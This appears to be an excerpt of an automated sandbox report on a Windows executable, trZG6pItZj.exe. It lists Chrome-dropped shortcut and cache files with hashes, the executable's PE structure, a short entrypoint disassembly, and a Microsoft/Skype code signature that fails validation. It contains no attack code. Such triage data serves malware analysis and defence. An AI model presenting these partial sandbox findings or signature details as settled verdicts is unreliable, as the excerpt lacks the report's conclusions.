                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.*....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.*....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.*....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.*..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............UB.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9987998436559393
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8qdUTYUT4HtidAKZdA1vehDiZUkwqehl5y+R:81/v5y
                                                                                                                                                                                                                                                                                                  MD5:63215B3920B17BA6DEED7736D83C5DFE
                                                                                                                                                                                                                                                                                                  SHA1:72CCA642A15707216C2ADC8EE4A539A5F09017C6
                                                                                                                                                                                                                                                                                                  SHA-256:854E33FCA013F299DB0A95701C5C919C90D77628B019B29F022493FB1B277D84
                                                                                                                                                                                                                                                                                                  SHA-512:6D25BE698529FBC144D4FDA6DED078B2767D0E59E40E9E1FE300FCCF27AD2AE12B565382F80ED5446DE0AFDC076FDF715F62C7E9A393D06CFEB70EF0CD887EDA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.........T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.*....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.*....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.*....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.*..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.*...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............UB.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2681
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.982640224212279
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8mdUTYUT4HtidAKZdA1hehBiZUk1W1qehb5y+C:8Z/P9ly
                                                                                                                                                                                                                                                                                                  MD5:7DAC980F1975BB6614BC716DF36C712A
                                                                                                                                                                                                                                                                                                  SHA1:6ADC679EA41F10C227A0410D6060AAC488DE7DDF
                                                                                                                                                                                                                                                                                                  SHA-256:227A1347072BE403E8C0E79057C17466BDDE0C41A0305DA49D909A0C7C8F38E0
                                                                                                                                                                                                                                                                                                  SHA-512:F23E2232A0CE9D1585ABE954AF8607266869C3B722DA6950650F5676B4768869211AD73A6C9886352C8D314268266C17ACF7BAF4542C6444EAC9FD26864DF2BA
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.........T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.*....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.*....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.*....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.*..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.*...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............UB.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Dec 23 04:23:57 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2683
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9960629321131926
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:8IdUTYUT4HtidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbd5y+yT+:8f/HT/TbxWOvTb3y7T
                                                                                                                                                                                                                                                                                                  MD5:3F06A35DCEEA084AAF96C4B6419AA32D
                                                                                                                                                                                                                                                                                                  SHA1:19B38FD0A8DDA35ADB2C4726C8995D7CBC21FD4A
                                                                                                                                                                                                                                                                                                  SHA-256:18B5F0B57F75464509283EB1A5090FA908419F2B9D0D4A09C3F190ADC96989E9
                                                                                                                                                                                                                                                                                                  SHA-512:0B2593A449DC07E891ED53F60E29FB98887DC9C8B05C2F79CC2AC8F1F5712B21852F84DF44B0C67A7284E63185DB70089CC184414468AE50DB9C186AD89DEDB9
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:L..................F.@.. ...$+.,.....d...T..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.*....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.*....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.*....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.*..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.*...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............UB.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                                                                  Chrome Cache Entry: 469

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3350)
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):3355
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.84499540652065
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:96:hUliXIN6666VcEDRwtLO0dFcVuzb1tGtfXfffffX:hCZN6666VHDWA0dFT58
                                                                                                                                                                                                                                                                                                  MD5:C829B72FF99ED29900FFD4DF0FCEAD02
                                                                                                                                                                                                                                                                                                  SHA1:C4982EB9319F65305DDB0C75D4E6EF5B84AA228E
                                                                                                                                                                                                                                                                                                  SHA-256:328FDA34FCD4FAC7F4D539FCD4037ED5D4A1394A37D96AC0B43444348ACC4943
                                                                                                                                                                                                                                                                                                  SHA-512:F03C2A3F8FCFD230841C3AC234BCE06092F62E2813B7F58F01B8D8CDD36E5AC5F44E24F0E63854A5E929829201BCB3DD53AC930422FA457F9C67DC1CD36C49D1
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                  Preview:)]}'.["",["ufc news","best christmas movies","fortnite cyberpunk 2077 skins","bitcoin price","nasa astronauts stuck","marvel rivals heroes tier list","narayana murthy","christmas travel weather forecast"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgkvbS8wMmN2OWsSEkluZGlhbiBidXNpbmVzc21hbjLjDWRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFEQVFBREFRQUFBQUFBQUFBQUFBQURCQVVHQUFJSEFmL0VBRE1RQUFJQkF3SURCUVlGQlFBQUFBQUFBQUVDQXdBRUVRVWhFakZoQmhOQlVYRWpRbEtCa2ZBVUlqS2h3UlV6WXJIeC8

                                                                                                                                                                                                                                                                                                  Chrome Cache Entry: 470

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                  MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                  SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                  SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                  SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"promos":{}}}

                                                                                                                                                                                                                                                                                                  Chrome Cache Entry: 471

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                                                  Size (bytes):132723
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4365026127579865
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:f3kJQ7O4N5dTm+syHEt4W3XdQ4Q68uSr/nUW2i6o:fiQ7HTt/sHdQ4Q68DfUW8o
                                                                                                                                                                                                                                                                                                  MD5:0B394E7E5B70E98DE0B536DA9F079F06
                                                                                                                                                                                                                                                                                                  SHA1:1CDCE37F7D186C4E7651172592A0937EA3031E22
                                                                                                                                                                                                                                                                                                  SHA-256:7F7441711D16430C73E740B28392AE2A2E50079FEA3E2B15AEB9E1DE21124F13
                                                                                                                                                                                                                                                                                                  SHA-512:0C967757171A9955CBEC22DCFDE838861907AA1B6F7EAE01DAD883545ABF434EF2F2469165FE40A3451ABF41DA6978622B9126A901A873A55B65149F80539DB4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                  Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

                                                                                                                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.965720773272215
                                                                                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                  File name:trZG6pItZj.exe
                                                                                                                                                                                                                                                                                                  File size:1'146'198 bytes
                                                                                                                                                                                                                                                                                                  MD5:1b31c291993985499cf544cc549e9028
                                                                                                                                                                                                                                                                                                  SHA1:068d213d11e48f8dda5d90a96512b8101f29ad9e
                                                                                                                                                                                                                                                                                                  SHA256:f8615202ee1e9ccb7509f98c643b7bd6e01e439c57b78fd547cf96fd27ec5a47
                                                                                                                                                                                                                                                                                                  SHA512:e60267556172f46e5d59a44bd60edc2639b6b26282ebb5615099bbd0cb2a3d7429b66fda1a7d02fb17f00c898fe3d289b7adcf73d51f139f3d87cd7e34388302
                                                                                                                                                                                                                                                                                                  SSDEEP:24576:whp0JbDs5hGLQlVGUUvJ5zYwe3H+2EEUsemRb3NpEWKj:kipohGLaGUU7zrm84jb37i
                                                                                                                                                                                                                                                                                                  TLSH:033533C2E6B06067DA8F1570A3719657AA3E7ABA3930C143A784DF8DB8653C1DA3434D
                                                                                                                                                                                                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                                                                                                                  Icon Hash:6066ced2d0c4fc0c

                                                                                                                                                                                                                                                                                                  Static PE Info

                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                  Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                  Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                  Digitally signed:true
                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                  Subsystem:windows gui
                                                                                                                                                                                                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                  Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                  TLS Callbacks:
                                                                                                                                                                                                                                                                                                  CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                  OS Version Major:5
                                                                                                                                                                                                                                                                                                  OS Version Minor:0
                                                                                                                                                                                                                                                                                                  File Version Major:5
                                                                                                                                                                                                                                                                                                  File Version Minor:0
                                                                                                                                                                                                                                                                                                  Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                  Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                  Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                                  Authenticode Signature

                                                                                                                                                                                                                                                                                                  Signature Valid:false
                                                                                                                                                                                                                                                                                                  Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                  Error Number:-2146869232
                                                                                                                                                                                                                                                                                                  Not Before, Not After
                                                                                                                                                                                                                                                                                                  • 24/04/2024 22:20:25 19/04/2025 22:20:25
                                                                                                                                                                                                                                                                                                  Subject Chain
                                                                                                                                                                                                                                                                                                  • CN=Skype Software Sarl, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                                                                                                  Version:3
                                                                                                                                                                                                                                                                                                  Thumbprint MD5:DCACFC48C220E288EE97E70A6850405C
                                                                                                                                                                                                                                                                                                  Thumbprint SHA-1:F05F9F4EA0A299F5AD361A9F96D5D57DD3B17D8B
                                                                                                                                                                                                                                                                                                  Thumbprint SHA-256:1C2B9B164269689BB5348EAAF60345BF635B32FD61B0230420C8BE7F94B3C56B
                                                                                                                                                                                                                                                                                                  Serial:33000003DDA34EC21B604513590000000003DD

                                                                                                                                                                                                                                                                                                  Entrypoint Preview

                                                                                                                                                                                                                                                                                                  Instruction
                                                                                                                                                                                                                                                                                                  sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                  push ebx
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                                  xor ebp, ebp
                                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                  push 00008001h
                                                                                                                                                                                                                                                                                                  call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                  push 00000008h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                  call 00007F867528410Bh
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push 000002B4h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  push 0040A264h
                                                                                                                                                                                                                                                                                                  call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                  push 0040A24Ch
                                                                                                                                                                                                                                                                                                  push 00476AA0h
                                                                                                                                                                                                                                                                                                  call 00007F8675283DEDh
                                                                                                                                                                                                                                                                                                  call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                  push edi
                                                                                                                                                                                                                                                                                                  call 00007F8675283DDBh
                                                                                                                                                                                                                                                                                                  push ebp
                                                                                                                                                                                                                                                                                                  call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                  cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                  mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                  mov eax, edi
                                                                                                                                                                                                                                                                                                  jne 00007F86752816DAh
                                                                                                                                                                                                                                                                                                  push 00000022h
                                                                                                                                                                                                                                                                                                  pop esi
                                                                                                                                                                                                                                                                                                  mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                  push esi
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  call 00007F8675283AB1h
                                                                                                                                                                                                                                                                                                  push eax
                                                                                                                                                                                                                                                                                                  call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                  mov esi, eax
                                                                                                                                                                                                                                                                                                  mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                  jmp 00007F8675281763h
                                                                                                                                                                                                                                                                                                  push 00000020h
                                                                                                                                                                                                                                                                                                  pop ebx
                                                                                                                                                                                                                                                                                                  cmp ax, bx
                                                                                                                                                                                                                                                                                                  jne 00007F86752816DAh
                                                                                                                                                                                                                                                                                                  add esi, 02h
                                                                                                                                                                                                                                                                                                  cmp word ptr [esi], bx

                                                                                                                                                                                                                                                                                                  Rich Headers

                                                                                                                                                                                                                                                                                                  Programming Language:
                                                                                                                                                                                                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                                                                  • [LNK] VS2010 SP1 build 40219

                                                                                                                                                                                                                                                                                                  Data Directories

                                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x4a556.rsrc
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1155360x2820.rsrc
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                                                                  Sections

                                                                                                                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                                                  .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                  .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                  .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                  .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                                                  .rsrc0x1000000x4a5560x4a6002ff988f1dc4ea0990d8600788102a18fFalse0.9697741596638656data7.914062938625981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                                                  .reloc0x14b0000xfd60x10003a08083c67cb0ea002559401e7766be1False0.59765625data5.576209654256569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                                                                  Resources

                                                                                                                                                                                                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                                                  RT_ICON0x1002800x3dd29PNG image data, 512 x 512, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9968999901273571
